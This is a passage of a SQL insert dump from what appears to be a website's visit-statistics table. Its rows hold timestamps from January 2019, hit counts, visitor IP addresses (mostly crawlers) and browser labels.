1548145583,1,1,0,0,'54.36.149.18','other'),(375281,1548145623,1,1,0,0,'8.29.198.26','other'),(375282,1548145749,1,1,0,0,'66.249.69.143','chrome'),(375283,1548145750,1,1,0,0,'66.249.69.150','chrome'),(375284,1548146027,1,1,0,0,'66.249.75.142','chrome'),(375285,1548146068,1,1,0,0,'46.229.168.142','other'),(375286,1548146223,1,1,0,0,'54.36.148.175','other'),(375287,1548146234,7,7,0,0,'216.244.66.241','other'),(375288,1548146289,1,1,0,0,'54.36.149.72','other'),(375289,1548146536,1,1,0,0,'37.73.224.144','chrome'),(375290,1548146686,1,1,0,0,'54.36.148.117','other'),(375291,1548146862,1,1,0,0,'54.36.148.16','other'),(375292,1548147270,1,1,0,0,'54.36.148.108','other'),(375293,1548147406,1,1,0,0,'46.229.168.138','other'),(375294,1548147475,1,1,0,0,'87.118.110.27','other'),(375295,1548147525,2,2,0,0,'178.95.105.12','chrome'),(375296,1548147653,1,1,0,0,'54.36.148.23','other'),(375297,1548147874,2,2,0,0,'216.244.66.241','other'),(375298,1548148486,2,2,0,0,'46.229.168.147','other'),(375299,1548148576,1,1,0,0,'91.196.178.104','chrome'),(375300,1548148601,1,1,0,0,'185.30.202.101','chrome'),(375301,1548148824,2,2,0,0,'91.209.11.236','other'),(375302,1548148878,6,6,0,0,'216.244.66.241','other'),(375303,1548149061,1,1,0,0,'54.36.148.137','other'),(375304,1548149247,1,1,0,0,'40.77.167.107','other'),(375305,1548149298,1,1,0,0,'35.192.84.7','other'),(375306,1548149470,1,1,0,0,'66.249.75.144','chrome'),(375307,1548149630,1,1,0,0,'87.250.224.47','other'),(375308,1548149845,1,1,0,0,'46.229.168.135','other'),(375309,1548149856,1,1,0,0,'54.36.148.235','other'),(375310,1548150093,1,1,0,0,'54.36.149.40','other'),(375311,1548150454,9,9,0,0,'216.244.66.241','other'),(375312,1548150464,1,1,0,0,'54.36.149.4','other'),(375313,1548150726,1,1,0,0,'37.9.113.148','other'),(375314,1548150783,1,1,0,0,'54.36.149.96','other'),(375315,1548150785,1,1,0,0,'5.45.207.79','other'),(375316,1548150797,1,1,0,0,'5.45.207.19','other'),(375317,1548150859,1,1,0,0,'54.36.149.44','other'),(375318,1548150890,1,1,0,0,'54.36.148.203','other'),(375319,1548151063,1,1,0,0,'54.36.148.161','other'),(375320,1548151504,1,1,0,0,'54.36.148.179','other'),(375321,1548151559,6,6,0,0,'216.244.66.241','other'),(375322,1548151637,1,1,0,0,'185.109.54.247','chrome'),(375323,1548151862,1,1,0,0,'54.36.148.85','other'),(375324,1548152034,1,1,0,0,'40.77.167.107','other'),(375325,1548152202,1,1,0,0,'35.192.84.7','other'),(375326,1548152384,1,1,0,0,'54.36.148.110','other'),(375327,1548152625,1,1,0,0,'54.36.148.136','other'),(375328,1548152693,1,1,0,0,'54.36.148.41','other'),(375329,1548152694,1,1,0,0,'54.36.148.28','other'),(375330,1548152710,1,1,0,0,'54.36.149.21','other'),(375331,1548152787,1,1,0,0,'54.36.149.78','other'),(375332,1548152873,1,1,0,0,'54.36.149.45','other'),(375333,1548152918,1,1,0,0,'157.55.39.189','other'),(375334,1548152955,1,1,0,0,'40.77.167.204','other'),(375335,1548153043,1,1,0,0,'54.36.148.165','other'),(375336,1548153232,2,2,0,0,'216.244.66.241','other'),(375337,1548153575,1,1,0,0,'66.249.69.143','chrome'),(375339,1548153746,2,2,0,0,'66.249.69.145','chrome'),(375340,1548153747,2,2,0,0,'66.249.69.148','chrome'),(375341,1548153846,1,1,0,0,'54.36.148.68','other'),(375342,1548154078,1,1,0,0,'54.36.149.72','other'),(375343,1548154131,2,2,0,0,'91.209.11.236','other'),(375344,1548154217,2,2,0,0,'91.196.178.66','chrome'),(375345,1548154328,1,1,0,0,'54.36.148.37','other'),(375346,1548154333,1,1,0,0,'54.36.149.100','other'),(375347,1548154470,3,3,0,0,'216.244.66.241','other'),(375348,1548154538,1,1,0,0,'54.36.148.62','other'),(375349,1548154585,1,1,0,0,'8.29.198.27','other'),(375350,1548154761,2,2,0,0,'195.69.223.246','chrome'),(375351,1548154776,1,1,0,0,'54.36.148.75','other'),(375352,1548154912,1,1,0,0,'54.36.148.134','other'),(375353,1548155119,1,1,0,0,'54.36.148.221','other'),(375354,1548155558,1,1,0,0,'54.36.149.85','other'),(375355,1548155618,1,1,0,0,'66.249.75.22','chrome'),(375356,1548155990,7,7,0,0,'216.244.66.241','other'),(375357,1548156070,1,1,0,0,'40.77.167.105','other'),(375358,1548156466,1,1,0,0,'8.29.198.26','other'),(375359,1548156835,1,1,0,0,'54.36.149.105','other'),(375360,1548156952,8,8,0,0,'216.244.66.241','other'),(375361,1548156963,1,1,0,0,'54.36.148.91','other'),(375362,1548157136,1,1,0,0,'66.249.75.21','chrome'),(375363,1548157182,1,1,0,0,'54.36.148.156','other'),(375364,1548157219,1,1,0,0,'54.36.148.238','other'),(375365,1548157492,1,1,0,0,'54.36.149.44','other'),(375366,1548157745,1,1,0,0,'54.36.148.98','other'),(375367,1548158025,1,1,0,0,'54.36.148.163','other'),(375368,1548158319,1,1,0,0,'46.229.168.153','other'),(375369,1548158418,1,1,0,0,'54.36.148.225','other'),(375370,1548158542,1,1,0,0,'54.36.148.208','other'),(375371,1548158546,1,1,0,0,'54.36.148.100','other'),(375372,1548158871,1,1,0,0,'54.36.148.53','other'),(375373,1548158877,1,1,0,0,'40.77.167.105','other'),(375374,1548158883,2,2,0,0,'216.244.66.241','other'),(375375,1548159306,1,1,0,0,'54.36.148.206','other'),(375376,1548159418,2,2,0,0,'91.209.11.236','other'),(375377,1548159877,1,1,0,0,'54.36.148.53','other'),(375378,1548159899,1,1,0,0,'46.229.168.137','other'),(375379,1548159929,1,1,0,0,'91.196.178.163','chrome'),(375380,1548159939,4,4,0,0,'216.244.66.241','other'),(375381,1548160180,2,2,0,0,'195.69.223.246','chrome'),(375382,1548160375,1,1,0,0,'46.229.168.136','other'),(375383,1548160402,1,1,0,0,'54.36.148.153','other'),(375384,1548160695,1,1,0,0,'54.36.149.64','other'),(375385,1548160774,1,1,0,0,'178.150.209.171','chrome'),(375386,1548160875,2,2,0,0,'91.196.178.66','chrome'),(375387,1548160963,1,1,0,0,'54.36.148.199','other'),(375388,1548161102,1,1,0,0,'54.36.149.41','other'),(375389,1548161147,1,1,0,0,'54.36.148.208','other'),(375390,1548161204,1,1,0,0,'54.36.148.106','other'),(375391,1548161368,1,1,0,0,'54.36.148.111','other'),(375392,1548161566,2,2,0,0,'216.244.66.241','other'),(375393,1548161722,1,1,0,0,'54.36.149.107','other'),(375394,1548161733,1,1,0,0,'54.36.148.54','other'),(375395,1548161853,1,1,0,0,'54.36.148.157','other'),(375396,1548162149,1,1,0,0,'54.36.149.5','other'),(375397,1548162175,1,1,0,0,'54.36.148.78','other'),(375398,1548162586,1,1,0,0,'54.36.148.66','other'),(375399,1548162633,7,7,0,0,'216.244.66.241','other'),(375400,1548162948,1,1,0,0,'178.154.244.49','other'),(375401,1548162958,2,2,0,0,'91.196.178.79','firefox'),(375402,1548163165,1,1,0,0,'54.36.148.54','other'),(375403,1548163223,1,1,0,0,'87.250.224.47','other'),(375404,1548163261,1,1,0,0,'54.36.148.59','other'),(375405,1548163388,1,1,0,0,'54.36.149.73','other'),(375406,1548163444,1,1,0,0,'54.36.149.38','other'),(375407,1548163509,1,1,0,0,'54.36.148.237','other'),(375408,1548163647,1,1,0,0,'46.201.11.220','chrome'),(375409,1548163996,3,3,0,0,'95.108.181.75','other'),(375410,1548164132,1,1,0,0,'54.36.148.172','other'),(375411,1548164196,1,1,0,0,'95.108.213.4','other'),(375412,1548164210,1,1,0,0,'178.154.171.24','other'),(375413,1548164315,8,8,0,0,'216.244.66.241','other'),(375414,1548164457,1,1,0,0,'157.55.39.189','other'),(375415,1548164470,1,1,0,0,'54.36.148.68','other'),(375416,1548164606,1,1,0,0,'54.36.148.247','other'),(375417,1548164751,1,1,0,0,'54.36.148.218','other'),(375418,1548164755,1,1,0,0,'54.36.148.181','other'),(375419,1548165068,1,1,0,0,'54.36.148.123','other'),(375420,1548165076,2,2,0,0,'66.249.75.16','chrome'),(375421,1548165077,2,2,0,0,'66.249.75.22','chrome'),(375422,1548165133,2,2,0,0,'91.196.178.66','chrome'),(375423,1548165165,1,1,0,0,'54.36.149.95','other'),(375424,1548165200,2,2,0,0,'91.196.177.46','firefox'),(375425,1548165326,1,1,0,0,'54.36.149.86','other'),(375426,1548165391,6,6,0,0,'216.244.66.241','other'),(375427,1548165412,1,1,0,0,'8.29.198.26','other'),(375428,1548165654,1,1,0,0,'54.36.148.66','other'),(375429,1548165877,1,1,0,0,'54.36.149.47','other'),(375430,1548165957,1,1,0,0,'54.36.148.53','other'),(375431,1548166213,1,1,0,0,'54.36.148.213','other'),(375432,1548166336,6,6,0,0,'216.244.66.241','other'),(375433,1548166474,1,1,0,0,'54.36.148.195','other'),(375434,1548166513,1,1,0,0,'46.229.168.148','other'),(375435,1548166515,1,1,0,0,'46.229.168.138','other'),(375436,1548166598,4,4,0,0,'37.53.89.22','chrome'),(375437,1548166616,1,1,0,0,'54.36.148.131','other'),(375438,1548166687,2,2,0,0,'176.108.106.6','chrome'),(375439,1548166907,1,1,0,0,'66.249.75.21','chrome'),(375440,1548167079,1,1,0,0,'46.229.168.130','other'),(375441,1548167241,2,2,0,0,'216.244.66.241','other'),(375442,1548167301,1,1,0,0,'8.29.198.27','other'),(375443,1548167518,1,1,0,0,'91.196.178.163','chrome'),(375444,1548167612,1,1,0,0,'46.229.168.129','other'),(375445,1548167662,1,1,0,0,'54.36.148.243','other'),(375446,1548168009,1,1,0,0,'5.45.207.19','other'),(375447,1548168199,10,10,0,0,'216.244.66.241','other'),(375448,1548168391,1,1,0,0,'54.36.149.1','other'),(375449,1548168640,1,1,0,0,'54.36.148.200','other'),(375450,1548168923,1,1,0,0,'54.36.149.71','other'),(375451,1548169318,1,1,0,0,'54.36.148.56','other'),(375452,1548169358,1,1,0,0,'54.36.149.19','other'),(375453,1548169421,2,2,0,0,'93.170.68.40','chrome'),(375454,1548169853,5,5,0,0,'216.244.66.241','other'),(375455,1548169882,2,2,0,0,'91.196.178.174','chrome'),(375456,1548169911,1,1,0,0,'54.36.148.231','other'),(375457,1548169939,1,1,0,0,'46.229.168.144','other'),(375458,1548169981,1,1,0,0,'13.57.233.99','chrome'),(375459,1548170268,1,1,0,0,'54.36.148.212','other'),(375460,1548170593,1,1,0,0,'54.36.148.90','other'),(375461,1548170730,1,1,0,0,'54.36.148.99','other'),(375462,1548170766,1,1,0,0,'54.36.149.99','other'),(375463,1548170850,1,1,0,0,'54.36.148.92','other'),(375464,1548170894,7,7,0,0,'216.244.66.241','other'),(375465,1548171415,1,1,0,0,'54.36.148.12','other'),(375466,1548171416,1,1,0,0,'66.249.75.140','chrome'),(375467,1548171815,1,1,0,0,'87.250.224.64','other'),(375468,1548172086,1,1,0,0,'178.154.171.24','other'),(375469,1548172159,1,1,0,0,'13.66.139.0','other'),(375470,1548172194,1,1,0,0,'46.229.168.142','other'),(375471,1548172628,7,7,0,0,'216.244.66.241','other'),(375472,1548172645,1,1,0,0,'54.36.148.16','other'),(375473,1548172962,1,1,0,0,'46.229.168.151','other'),(375474,1548172963,1,1,0,0,'46.229.168.134','other'),(375475,1548172973,1,1,0,0,'54.36.148.69','other'),(375476,1548173164,1,1,0,0,'54.36.148.173','other'),(375477,1548173254,1,1,0,0,'54.36.148.167','other'),(375478,1548173277,1,1,0,0,'54.36.148.164','other'),(375479,1548173465,1,1,0,0,'54.36.149.64','other'),(375480,1548173530,2,2,0,0,'216.244.66.241','other'),(375481,1548173950,2,2,0,0,'60.191.38.77','firefox'),(375482,1548174157,1,1,0,0,'54.36.148.33','other'),(375483,1548174261,3,3,0,0,'173.212.233.72','chrome'),(375484,1548174364,1,1,0,0,'54.36.148.68','other'),(375485,1548174650,1,1,0,0,'54.36.149.32','other'),(375486,1548174973,1,1,0,0,'167.114.157.79','other'),(375487,1548174994,4,4,0,0,'37.120.146.183','chrome'),(375488,1548175007,1,1,0,0,'167.114.157.79','chrome'),(375489,1548175029,1,1,0,0,'54.36.148.164','other'),(375490,1548175057,1,1,0,0,'54.36.148.138','other'),(375491,1548175123,1,1,0,0,'40.77.167.107','other'),(375492,1548175285,1,1,0,0,'66.249.75.140','chrome'),(375493,1548175355,1,1,0,0,'66.249.75.20','chrome'),(375494,1548175425,7,7,0,0,'216.244.66.241','other'),(375495,1548175599,1,1,0,0,'40.77.167.94','other'),(375496,1548175661,1,1,0,0,'54.36.148.128','other'),(375497,1548175777,1,1,0,0,'54.36.148.169','other'),(375498,1548175992,1,1,0,0,'180.76.15.29','other'),(375499,1548175993,1,1,0,0,'180.76.15.30','other'),(375500,1548176243,1,1,0,0,'8.29.198.27','other'),(375501,1548176406,1,1,0,0,'54.36.148.71','other'),(375502,1548176460,1,1,0,0,'54.36.148.182','other'),(375503,1548176538,1,1,0,0,'40.77.167.107','other'),(375504,1548176565,2,2,0,0,'144.76.3.131','other'),(375505,1548176832,4,4,0,0,'216.244.66.241','other'),(375506,1548176835,1,1,0,0,'54.36.149.96','other'),(375507,1548176909,1,1,0,0,'46.229.168.149','other'),(375508,1548177268,1,1,0,0,'54.36.148.241','other'),(375509,1548177387,1,1,0,0,'46.229.168.135','other'),(375510,1548177428,1,1,0,0,'66.249.75.144','chrome'),(375511,1548177439,1,1,0,0,'178.154.171.24','other'),(375512,1548177665,1,1,0,0,'46.229.168.148','other'),(375513,1548177730,1,1,0,0,'66.249.75.20','chrome'),(375514,1548177753,1,1,0,0,'54.36.148.42','other'),(375515,1548177815,1,1,0,0,'54.36.148.168','other'),(375516,1548177929,1,1,0,0,'54.36.148.82','other'),(375517,1548177948,1,1,0,0,'54.36.148.91','other'),(375518,1548178132,1,1,0,0,'8.29.198.26','other'),(375519,1548178240,5,5,0,0,'216.244.66.241','other'),(375520,1548178377,1,1,0,0,'54.36.148.31','other'),(375521,1548178440,1,1,0,0,'95.108.181.83','other'),(375522,1548178473,1,1,0,0,'46.229.168.134','other'),(375523,1548178519,1,1,0,0,'54.36.148.111','other'),(375524,1548178915,1,1,0,0,'40.77.167.68','other'),(375525,1548179158,4,4,0,0,'216.244.66.241','other'),(375526,1548179584,1,1,0,0,'54.36.149.107','other'),(375527,1548179623,1,1,0,0,'54.36.149.72','other'),(375528,1548179677,1,1,0,0,'54.36.148.25','other'),(375529,1548179832,3,3,0,0,'40.77.167.46','other'),(375530,1548179869,1,1,0,0,'54.36.148.145','other'),(375531,1548179915,1,1,0,0,'54.36.149.105','other'),(375532,1548180076,1,1,0,0,'54.36.149.21','other'),(375533,1548180084,1,1,0,0,'54.36.148.102','other'),(375534,1548180135,1,1,0,0,'216.244.66.241','other'),(375535,1548180357,1,1,0,0,'178.154.171.27','other'),(375536,1548180361,2,2,0,0,'141.8.132.16','other'),(375537,1548180670,1,1,0,0,'87.250.224.118','other'),(375538,1548180812,1,1,0,0,'54.36.148.224','other'),(375539,1548180821,2,2,0,0,'91.209.11.236','other'),(375540,1548180850,1,1,0,0,'178.154.200.48','other'),(375541,1548180950,1,1,0,0,'95.108.213.4','other'),(375542,1548181057,2,2,0,0,'91.196.178.69','firefox'),(375543,1548181058,1,1,0,0,'54.36.148.38','other'),(375544,1548181092,1,1,0,0,'46.229.168.137','other'),(375545,1548181120,1,1,0,0,'54.36.148.249','other'),(375546,1548181140,1,1,0,0,'95.108.181.75','other'),(375547,1548181173,1,1,0,0,'54.36.148.96','other'),(375548,1548181227,8,8,0,0,'216.244.66.241','other'),(375549,1548181302,1,1,0,0,'54.36.149.7','other'),(375550,1548181361,2,2,0,0,'46.211.25.124','chrome'),(375551,1548181374,1,1,0,0,'54.36.148.79','other'),(375552,1548181729,1,1,0,0,'54.36.148.148','other'),(375553,1548181884,1,1,0,0,'54.36.148.124','other'),(375554,1548182039,1,1,0,0,'54.36.148.83','other'),(375555,1548182119,1,1,0,0,'54.36.148.253','other'),(375556,1548182209,1,1,0,0,'54.36.148.38','other'),(375557,1548182351,1,1,0,0,'54.36.149.81','other'),(375558,1548182690,1,1,0,0,'46.229.168.146','other'),(375559,1548182804,1,1,0,0,'54.36.149.31','other'),(375560,1548182901,1,1,0,0,'178.154.171.30','other'),(375561,1548183024,2,2,0,0,'95.180.189.139','firefox'),(375562,1548183227,1,1,0,0,'54.36.148.168','other'),(375563,1548183402,1,1,0,0,'207.46.13.48','other'),(375564,1548183405,1,1,0,0,'54.36.149.21','other'),(375565,1548183468,2,2,0,0,'157.55.39.9','other'),(375566,1548183552,1,1,0,0,'157.55.39.51','other'),(375567,1548183667,1,1,0,0,'54.36.148.250','other'),(375568,1548183815,1,1,0,0,'180.76.15.16','other'),(375569,1548183918,1,1,0,0,'54.36.149.74','other'),(375570,1548183928,16,16,0,0,'216.244.66.241','other'),(375571,1548184241,1,1,0,0,'46.229.168.140','other'),(375572,1548184895,5,5,0,0,'216.244.66.241','other'),(375573,1548184902,1,1,0,0,'54.36.148.201','other'),(375574,1548185455,1,1,0,0,'54.36.149.48','other'),(375575,1548185511,1,1,0,0,'54.36.148.20','other'),(375576,1548185531,1,1,0,0,'54.36.149.36','other'),(375577,1548185577,1,1,0,0,'54.36.148.146','other'),(375578,1548185614,1,1,0,0,'54.36.148.232','other'),(375579,1548185688,1,1,0,0,'46.229.168.148','other'),(375580,1548185690,1,1,0,0,'46.229.168.141','other'),(375581,1548185961,1,1,0,0,'54.36.148.135','other'),(375582,1548186268,1,1,0,0,'54.36.148.52','other'),(375583,1548186365,1,1,0,0,'54.36.148.203','other'),(375584,1548186429,1,1,0,0,'54.36.148.179','other'),(375585,1548186586,4,4,0,0,'216.244.66.241','other'),(375586,1548186671,1,1,0,0,'54.36.149.38','other'),(375587,1548186978,1,1,0,0,'54.36.148.19','other'),(375588,1548187008,2,2,0,0,'178.255.215.94','other'),(375589,1548187009,1,1,0,0,'54.36.148.229','other'),(375590,1548187083,1,1,0,0,'8.29.198.27','other'),(375591,1548187558,1,1,0,0,'46.229.168.145','other'),(375592,1548187560,1,1,0,0,'46.229.168.139','other'),(375593,1548187638,1,1,0,0,'54.36.148.205','other'),(375594,1548187728,1,1,0,0,'54.36.148.115','other'),(375595,1548187776,1,1,0,0,'46.229.168.152','other'),(375596,1548187778,1,1,0,0,'46.229.168.141','other'),(375597,1548187815,1,1,0,0,'180.76.15.27','other'),(375598,1548187816,1,1,0,0,'180.76.15.20','other'),(375599,1548187820,2,2,0,0,'207.46.13.208','other'),(375600,1548187859,2,2,0,0,'91.196.178.103','chrome'),(375601,1548187895,1,1,0,0,'54.36.148.167','other'),(375602,1548187897,2,2,0,0,'216.244.66.241','other'),(375603,1548188329,1,1,0,0,'54.36.148.131','other'),(375604,1548188551,1,0,1,0,'66.249.75.157',''),(375605,1548188581,1,1,0,0,'46.229.168.142','other'),(375606,1548188590,2,0,2,0,'66.249.75.144',''),(375607,1548188782,1,1,0,0,'66.249.75.20','chrome'),(375608,1548188959,1,1,0,0,'8.29.198.27','other'),(375609,1548189355,1,1,0,0,'54.36.149.62','other'),(375610,1548189359,7,7,0,0,'216.244.66.241','other'),(375611,1548189696,1,1,0,0,'54.36.148.67','other'),(375612,1548189963,1,1,0,0,'141.8.142.191','other'),(375613,1548189992,1,1,0,0,'157.55.39.165','other'),(375614,1548190013,1,1,0,0,'54.36.149.1','other'),(375615,1548190038,1,1,0,0,'54.36.149.4','other'),(375616,1548190088,1,1,0,0,'54.36.149.67','other'),(375617,1548190181,1,1,0,0,'141.8.183.22','other'),(375618,1548190339,7,7,0,0,'216.244.66.241','other'),(375619,1548190352,1,1,0,0,'54.36.149.100','other'),(375620,1548190373,1,1,0,0,'178.154.171.24','other'),(375621,1548190376,1,1,0,0,'178.154.244.65','other'),(375622,1548190379,1,1,0,0,'178.154.200.48','other'),(375623,1548190401,1,1,0,0,'54.36.148.21','other'),(375624,1548190498,1,1,0,0,'46.229.168.136','other'),(375625,1548190503,1,1,0,0,'54.36.149.94','other'),(375626,1548190544,1,1,0,0,'54.36.149.12','other'),(375627,1548190550,2,2,0,0,'141.8.183.23','other'),(375628,1548190703,1,1,0,0,'54.36.149.89','other'),(375629,1548190774,1,1,0,0,'54.36.148.24','other'),(375630,1548190800,1,1,0,0,'54.36.148.100','other'),(375631,1548190959,1,1,0,0,'5.45.207.8','other'),(375632,1548190962,1,1,0,0,'37.9.113.148','other'),(375633,1548191056,1,1,0,0,'40.77.167.36','other'),(375634,1548191101,1,1,0,0,'213.180.203.40','other'),(375635,1548191162,1,1,0,0,'54.36.149.87','other'),(375636,1548191177,1,1,0,0,'54.36.149.39','other'),(375637,1548191363,1,1,0,0,'54.36.148.150','other'),(375638,1548191591,1,0,1,0,'94.220.67.53',''),(375639,1548191608,1,1,0,0,'54.36.149.29','other'),(375640,1548192037,1,1,0,0,'66.249.75.16','chrome'),(375641,1548192039,1,1,0,0,'66.249.75.20','chrome'),(375642,1548192044,1,1,0,0,'40.77.169.26','other'),(375643,1548192113,7,7,0,0,'216.244.66.241','other'),(375644,1548192256,1,1,0,0,'54.36.148.155','other'),(375645,1548192355,1,1,0,0,'54.36.149.37','other'),(375646,1548192394,1,1,0,0,'91.196.178.168','chrome'),(375647,1548192456,1,1,0,0,'54.36.148.47','other'),(375648,1548192507,1,1,0,0,'46.229.168.134','other'),(375649,1548192860,1,1,0,0,'157.55.39.180','other'),(375650,1548193032,1,1,0,0,'54.36.148.175','other'),(375651,1548193151,5,5,0,0,'216.244.66.241','other'),(375652,1548193258,1,1,0,0,'54.36.148.184','other'),(375653,1548193281,1,1,0,0,'54.36.149.53','other'),(375654,1548193284,1,1,0,0,'46.229.168.152','other'),(375655,1548193285,1,1,0,0,'46.229.168.145','other'),(375656,1548193762,1,1,0,0,'54.36.149.82','other'),(375657,1548193938,1,1,0,0,'54.36.149.76','other'),(375658,1548193987,1,1,0,0,'46.229.168.129','other'),(375659,1548193990,2,2,0,0,'157.55.39.180','other'),(375660,1548194026,1,1,0,0,'54.36.149.106','other'),(375661,1548194139,2,2,0,0,'157.55.39.182','other'),(375662,1548194249,1,1,0,0,'54.36.149.34','other'),(375663,1548194299,1,1,0,0,'54.36.148.132','other'),(375664,1548194338,1,1,0,0,'66.249.69.148','chrome'),(375665,1548194354,1,1,0,0,'54.36.148.14','other'),(375666,1548194397,1,1,0,0,'54.36.149.93','other'),(375667,1548194413,1,1,0,0,'54.36.148.209','other'),(375668,1548194521,1,1,0,0,'54.36.148.34','other'),(375669,1548194876,1,1,0,0,'54.36.149.43','other'),(375670,1548194883,6,6,0,0,'216.244.66.241','other'),(375671,1548195047,1,1,0,0,'54.36.149.73','other'),(375672,1548195060,1,1,0,0,'54.36.148.82','other'),(375673,1548195831,8,8,0,0,'216.244.66.241','other'),(375674,1548195857,1,1,0,0,'54.36.149.81','other'),(375675,1548196428,1,1,0,0,'54.36.148.251','other'),(375676,1548196607,1,1,0,0,'54.36.148.95','other'),(375677,1548196778,5,5,0,0,'216.244.66.241','other'),(375678,1548196841,1,1,0,0,'54.36.149.105','other'),(375679,1548197029,1,1,0,0,'54.36.148.221','other'),(375680,1548197127,1,1,0,0,'54.36.148.151','other'),(375681,1548197204,1,1,0,0,'207.46.13.16','other'),(375682,1548197235,1,1,0,0,'66.249.75.20','chrome'),(375683,1548197342,1,1,0,0,'46.229.168.135','other'),(375684,1548197605,1,1,0,0,'54.36.148.57','other'),(375685,1548197655,1,1,0,0,'54.36.148.104','other'),(375686,1548197931,1,1,0,0,'8.29.198.26','other'),(375687,1548198041,1,1,0,0,'54.36.149.83','other'),(375688,1548198055,7,7,0,0,'216.244.66.241','other'),(375689,1548198459,1,1,0,0,'54.36.149.51','other'),(375690,1548198586,1,1,0,0,'54.36.148.196','other'),(375691,1548198718,1,1,0,0,'54.36.148.156','other'),(375692,1548198807,1,1,0,0,'46.229.168.130','other'),(375693,1548198809,1,1,0,0,'46.229.168.137','other'),(375694,1548199026,6,6,0,0,'216.244.66.241','other'),(375695,1548199180,1,1,0,0,'54.36.148.89','other'),(375696,1548199307,1,1,0,0,'66.249.75.16','chrome'),(375697,1548199309,1,1,0,0,'66.249.75.21','chrome'),(375698,1548199391,1,1,0,0,'91.242.162.46','other'),(375699,1548199803,1,1,0,0,'8.29.198.27','other'),(375700,1548199851,2,2,0,0,'157.55.39.184','other'),(375701,1548200029,1,1,0,0,'207.46.13.20','other'),(375702,1548200032,1,1,0,0,'46.229.168.143','other'),(375703,1548200205,1,1,0,0,'54.36.148.227','other'),(375704,1548200250,1,1,0,0,'54.36.148.143','other'),(375705,1548200254,1,1,0,0,'54.36.148.248','other'),(375706,1548200288,1,1,0,0,'128.68.35.251','msie'),(375707,1548200293,2,2,0,0,'185.234.217.126','msie'),(375708,1548200381,1,1,0,0,'66.249.75.22','chrome'),(375709,1548200382,5,5,0,0,'216.244.66.241','other'),(375710,1548200492,1,1,0,0,'66.249.75.21','chrome'),(375711,1548200700,1,1,0,0,'54.36.149.93','other'),(375712,1548200775,1,1,0,0,'46.229.168.146','other'),(375713,1548200918,1,1,0,0,'54.36.149.56','other'),(375714,1548201016,1,1,0,0,'46.229.168.149','other'),(375715,1548201149,1,1,0,0,'54.36.149.14','other'),(375716,1548201308,12,12,0,0,'216.244.66.241','other'),(375717,1548201360,1,1,0,0,'66.249.75.153','chrome'),(375718,1548201366,1,1,0,0,'66.249.75.142','chrome'),(375719,1548201412,1,1,0,0,'54.36.149.49','other'),(375720,1548201493,1,1,0,0,'54.36.148.180','other'),(375721,1548201556,1,1,0,0,'40.77.167.117','other'),(375722,1548201864,1,1,0,0,'35.192.84.7','other'),(375723,1548202159,1,1,0,0,'54.36.149.85','other'),(375724,1548202247,2,2,0,0,'157.55.39.184','other'),(375725,1548202375,1,1,0,0,'54.36.148.150','other'),(375726,1548202725,1,1,0,0,'141.8.142.38','other'),(375727,1548202974,1,1,0,0,'95.108.181.94','other'),(375728,1548203011,1,1,0,0,'178.154.200.48','other'),(375729,1548203061,1,1,0,0,'54.36.148.245','other'),(375730,1548203128,2,2,0,0,'178.154.244.65','other'),(375731,1548203142,7,7,0,0,'216.244.66.241','other'),(375732,1548203173,1,1,0,0,'141.8.142.81','other'),(375733,1548203256,1,1,0,0,'95.108.213.50','other'),(375734,1548203541,1,1,0,0,'54.36.148.133','other'),(375735,1548203552,1,1,0,0,'54.36.148.42','other'),(375736,1548203624,1,1,0,0,'46.229.168.136','other'),(375737,1548203694,1,1,0,0,'54.36.148.166','other'),(375738,1548203772,1,1,0,0,'54.36.148.239','other'),(375739,1548204043,5,5,0,0,'216.244.66.241','other'),(375740,1548204408,1,1,0,0,'35.192.84.7','other'),(375741,1548204425,1,1,0,0,'54.36.148.216','other'),(375742,1548204434,1,1,0,0,'54.36.149.59','other'),(375743,1548204437,1,1,0,0,'46.229.168.137','other'),(375744,1548204630,1,1,0,0,'40.77.167.117','other'),(375745,1548204889,1,1,0,0,'46.229.168.136','other'),(375746,1548204912,1,1,0,0,'51.77.177.194','other'),(375747,1548205099,3,3,0,0,'216.244.66.241','other'),(375748,1548205167,1,1,0,0,'54.36.149.10','other'),(375749,1548205660,1,1,0,0,'46.229.168.133','other'),(375750,1548205676,1,1,0,0,'66.249.75.21','chrome'),(375751,1548205828,1,1,0,0,'54.36.148.193','other'),(375752,1548205956,1,1,0,0,'66.249.75.153','chrome'),(375753,1548205965,1,1,0,0,'66.249.75.140','chrome'),(375754,1548206150,2,2,0,0,'40.77.167.117','other'),(375755,1548206287,7,7,0,0,'216.244.66.241','other'),(375756,1548206695,1,1,0,0,'40.77.167.31','other'),(375757,1548207118,1,1,0,0,'54.36.148.114','other'),(375758,1548207296,3,3,0,0,'216.244.66.241','other'),(375759,1548207431,1,1,0,0,'54.36.148.48','other'),(375760,1548207777,1,1,0,0,'54.36.149.36','other'),(375761,1548207784,1,1,0,0,'51.255.65.46','other'),(375762,1548207804,1,1,0,0,'54.36.149.105','other'),(375763,1548208025,1,0,1,0,'66.249.75.17',''),(375764,1548208029,1,0,1,0,'66.249.75.22',''),(375765,1548208704,14,14,0,0,'216.244.66.241','other'),(375766,1548208729,1,1,0,0,'54.36.148.14','other'),(375767,1548208750,1,1,0,0,'54.36.148.231','other'),(375768,1548208763,1,1,0,0,'8.29.198.25','other'),(375769,1548208767,1,1,0,0,'54.36.148.161','other'),(375770,1548209017,1,1,0,0,'66.249.75.15','chrome'),(375771,1548209020,1,1,0,0,'66.249.75.20','chrome'),(375772,1548209296,1,1,0,0,'40.77.167.152','other'),(375773,1548209384,1,1,0,0,'54.36.148.246','other'),(375774,1548209621,1,1,0,0,'66.249.75.22','chrome'),(375775,1548209764,1,1,0,0,'54.36.148.78','other'),(375776,1548209968,1,1,0,0,'54.36.148.131','other'),(375777,1548210163,1,1,0,0,'54.36.148.29','other'),(375778,1548210237,2,2,0,0,'40.77.167.117','other'),(375779,1548210379,1,1,0,0,'54.36.148.107','other'),(375780,1548210409,1,1,0,0,'54.36.149.8','other'),(375781,1548210457,1,1,0,0,'54.36.148.205','other'),(375782,1548210511,1,1,0,0,'5.45.207.19','other'),(375783,1548210516,1,1,0,0,'141.8.142.103','other'),(375784,1548210528,1,1,0,0,'54.36.148.161','other'),(375785,1548210636,1,1,0,0,'8.29.198.26','other'),(375786,1548210859,1,1,0,0,'40.77.167.155','other'),(375787,1548210910,1,1,0,0,'54.36.148.242','other'),(375788,1548211183,2,2,0,0,'54.184.28.233','chrome'),(375789,1548211349,1,1,0,0,'54.36.148.199','other'),(375790,1548211378,7,7,0,0,'216.244.66.241','other'),(375791,1548212014,1,1,0,0,'54.36.148.108','other'),(375792,1548212102,1,1,0,0,'66.249.75.22','chrome'),(375793,1548212248,1,1,0,0,'54.36.149.47','other